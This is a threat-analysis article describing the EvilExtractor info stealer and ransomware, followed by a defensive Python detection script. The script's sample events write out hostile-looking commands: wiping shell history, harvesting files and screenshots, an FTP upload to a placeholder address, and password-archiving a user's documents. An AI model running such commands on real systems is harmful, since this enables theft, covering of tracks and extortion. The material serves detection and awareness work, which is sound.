EvilExtractor Sold as ‘Educational Tool’ is Info Stealer

EvilExtractor is an info stealer malware tool designed for data theft attacks against Windows operating systems. Researchers at Fortinet’s threat research group, FortiGuard Labs, have published an analysis of the tool detailing its attack method and its impact on victims. The research concluded that, although the tool does not target any specific industry, most of its victims have been located in Europe and America. A key feature of this tool is that it has been marketed online both while masquerading as a legitimate ‘educational tool’ and through promotion to threat actors on known hacking forums. The malware contains ransomware, credential extraction and Windows Defender bypassing functionality, and has been found in active use by cybercriminals.


The NCSC (National Cyber Security Centre), a branch of GCHQ, has recently published the report “The threat from commercial cyber proliferation”, which concluded that:

“Commercial cyber tools and services lower the barrier to entry to state and non-state actors in obtaining cost-effective capability and intelligence they would not otherwise be able to develop or acquire themselves. This commercial proliferation will almost certainly be transformational on the cyber landscape.”


In the case of EvilExtractor this is even more likely to be true, as the creator company, Kodex, continues to claim it is an educational tool and has therefore been able to market it as a legitimate product despite its functionality as attack software. Because of this claim it can even be found through Google searches, where the site description states “Evil Extractor is an attack software developed by Kodex for Windows-based operating systems. It offers two modes of operation: Single Bullet and RAT” and links to a now unavailable site, evilextractor[.]com.


The attacks conducted in the wild using EvilExtractor begin with a phishing email made to look like an account confirmation request. The email carries a gzip-compressed executable as an attachment, disguised as a legitimate document by displaying the Adobe PDF icon in the email. The attachment contains a Python program obfuscated with PyArmor (the PYARMOR string appears in its main code), which makes the malware harder to detect and analyse. Researchers also found a .NET loader alongside this Python program, used to extract the EvilExtractor PowerShell script. The executable itself was generated with PS2EXE-GUI, a tool that converts PowerShell scripts into .EXE files.


The EvilExtractor PowerShell script contains 7 modules: Date time checking, Anti-Sandbox, Anti-VM, Anti-Scanner, FTP server setting, Steal data, Upload Stolen data, and Clear log. Before beginning any malicious action, the script checks whether the system date falls between 2022-11-09 and 2023-04-12. Together with a check of the product model against known virtual machine products and a check of the hostname against a list of VirusTotal, scanner and virtual machine names, this is used to decide whether the malware is running in a sandbox or a virtual environment. If the system does not satisfy the conditions the script requires for the attack to continue, it deletes the data held by PSReadline (the PowerShell command history) and terminates.


If the conditions for the attack to continue are satisfied, EvilExtractor downloads three additional components from an identified source IP. All three are Python programs obfuscated with PyArmor and are used for data stealing. The first, KK2023.zip, extracts cookies from Google Chrome, Microsoft Edge, Opera and Firefox, and steals browser history and saved passwords from a range of browsers including Google Chrome and Microsoft Edge; the stolen browser data is saved to the folder IMP_Data. The second, Confirm.zip, is a keylogger that is deployed on the victim’s machine and saves the captured keyboard input to the folder KeyLogs. The third, MnMs.zip, is a webcam extractor that can activate the machine’s webcam to capture video or images.


System information is also collected via a PowerShell script and stored in the text file Credentials.txt. Other files in the Desktop and Downloads folders are selected for exfiltration based on their file extension; the extensions included in this data gathering process include jpg, png, jpeg, mp4, mpeg, mp3, avi, txt, rtf, xlsx, docx, pptx, pdf, rar, zip, 7z, csv, xml and html. The CopyFromScreen method is also called to take a screenshot of the machine. Once all the data has been gathered and saved, it is uploaded to an FTP server controlled by the attacker. This server is part of the service the sellers of EvilExtractor offer when they market their malware.


The original EvilExtractor .NET loader extracted from the Python program in the phishing email also contains a ransomware function, called Kodex Ransomware. This is another PowerShell script, which downloads a file named zzyy.zip from evilextractor[.]com. The archive contains the 7-Zip standalone console executable, 7za.exe, which is used to encrypt the victim’s files: they are packed into a password-protected archive using the executable’s -p parameter. A ransom note is then produced to inform victims that their files have been encrypted and to demand payment in BTC before a decryption key is released. The ransom message also contains a countdown timer, set by the attackers to add pressure on the victims, with the claim that once it expires they will never be able to access their encrypted files again.

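As an added defender-side example (not code from this article, from SecureTeam or from FortiGuard Labs), the Python script below turns the behaviours described in the anti-sandbox/Clear log, data gathering and Kodex Ransomware passages above into simple process-command-line detection rules and runs them over constructed sample events. The event format, the rule names, the TEST-NET address 203.0.113.10, the placeholder password and the exact shape of the 7za.exe command line are all assumptions made for the example; the product-model VM check is not modelled because the article does not name the strings it compares against.

```python
import re

# Constructed sample process-creation events (not taken from the Fortinet report).
# Each one imitates a behaviour the article attributes to EvilExtractor.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # date gate that wipes the PSReadline history and exits when it fails
     "cmdline": "powershell -w hidden -c \"if((Get-Date) -gt [datetime]'2023-04-12')"
                "{Remove-Item (Get-PSReadlineOption).HistorySavePath; exit}\""},
    {"id": 2, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # screenshot via CopyFromScreen plus extension-based collection from Desktop/Downloads
     "cmdline": r'powershell -c "Add-Type -AssemblyName System.Drawing; '
                r'$g=[System.Drawing.Graphics]::FromImage($b); $g.CopyFromScreen(0,0,0,0,$b.Size); '
                r'Get-ChildItem $env:USERPROFILE\Desktop,$env:USERPROFILE\Downloads '
                r'-Include *.docx,*.xlsx,*.pdf,*.jpg,*.zip -Recurse"'},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # upload of the gathered data to an FTP server (203.0.113.10 is a TEST-NET placeholder)
     "cmdline": 'powershell -c "$c=New-Object System.Net.WebClient; '
                '$c.UploadFile(\'ftp://203.0.113.10/IMP_Data.zip\',\'C:\\Users\\victim\\IMP_Data.zip\')"'},
    {"id": 4, "image": r"C:\Users\victim\AppData\Local\Temp\7za.exe",
     # Kodex Ransomware stage: 7-Zip console binary packing files into a password-protected archive
     "cmdline": r"7za.exe a -pEXAMPLE_PASSWORD -mhe=on C:\Users\victim\Documents\locked.zip "
                r"C:\Users\victim\Documents\*"},
    {"id": 5, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # benign control event: a date lookup with no gating, wiping or collection
     "cmdline": 'powershell -c "Get-Date"'},
]

# Extensions the article lists as selected for exfiltration.
TARGET_EXTENSIONS = ("jpg", "png", "jpeg", "mp4", "mpeg", "mp3", "avi", "txt", "rtf",
                     "xlsx", "docx", "pptx", "pdf", "rar", "zip", "7z", "csv", "xml", "html")
EXT_RE = re.compile(r"\.(" + "|".join(TARGET_EXTENSIONS) + r")\b", re.IGNORECASE)

# A rule fires only when every pattern in its list matches the command line.
CMDLINE_RULES = {
    "date-gated-execution": [r"Get-Date", r"\[datetime\]|\s-lt\s|\s-gt\s"],
    "psreadline-history-wipe": [r"PSReadline", r"Remove-Item|Clear-Content|\bdel\b"],
    "screenshot-capture": [r"CopyFromScreen"],
    "ftp-exfiltration": [r"ftp://", r"UploadFile|FtpWebRequest|WebClient"],
}


def _archive_with_password(image: str, cmdline: str) -> bool:
    """7-Zip console binary adding files ('a') with a -p password argument."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name not in {"7za.exe", "7z.exe"}:
        return False
    return (re.search(r"(^|\s)a\s", cmdline) is not None
            and re.search(r"\s-p\S*", cmdline) is not None)


def _bulk_file_collection(cmdline: str) -> bool:
    """Three or more of the listed extensions referenced together with Desktop/Downloads."""
    exts = {m.lower() for m in EXT_RE.findall(cmdline)}
    return len(exts) >= 3 and re.search(r"Desktop|Downloads", cmdline, re.IGNORECASE) is not None


def evaluate(event: dict) -> list:
    """Return the sorted list of rule names that fire for one process event."""
    cmd = event["cmdline"]
    hits = [name for name, patterns in CMDLINE_RULES.items()
            if all(re.search(p, cmd, re.IGNORECASE) for p in patterns)]
    if _bulk_file_collection(cmd):
        hits.append("bulk-file-collection")
    if _archive_with_password(event["image"], cmd):
        hits.append("password-protected-archive")
    return sorted(hits)


def analyze(events: list) -> dict:
    """Map each event id to the rules it triggered; an empty list means nothing fired."""
    return {e["id"]: evaluate(e) for e in events}


if __name__ == "__main__":
    for event_id, hits in analyze(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(hits) if hits else 'no findings'}")
```

Any single rule on its own is weak (a legitimate backup job can call 7za.exe with -p, and administrators do clear shell history), so in practice these would feed a correlation rule that raises severity when several fire from the same process tree within a short window, and the FTP destination would be compared against the IoC list published by FortiGuard Labs.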

Since its first appearance in October 2022, the EvilExtractor malware and ransomware has gained many additional malicious features from its developer, and it continues to be a threat, with attacks using the tool peaking last month, in March 2023. An antivirus or endpoint detection and prevention system that can efficiently block malicious URLs in real time can help protect your devices from these sorts of commercial attack tools. A list of indicators of compromise, including known URLs and IPs associated with this attack tool, can be found in FortiGuard Labs’ analysis blog post.


However, given the commercial proliferation and constant evolution of these attack tools and their capabilities, the best way to avoid falling victim is not to block the URLs and IPs involved (which can change quickly) but to prevent the malware from being installed on your devices in the first place, by checking emails vigilantly for potential phishing attempts. Educating staff to spot potential phishing emails and report them to the IT security team is an essential form of protection for your network, alongside the technical controls offered by next generation firewalls and endpoint protection software.
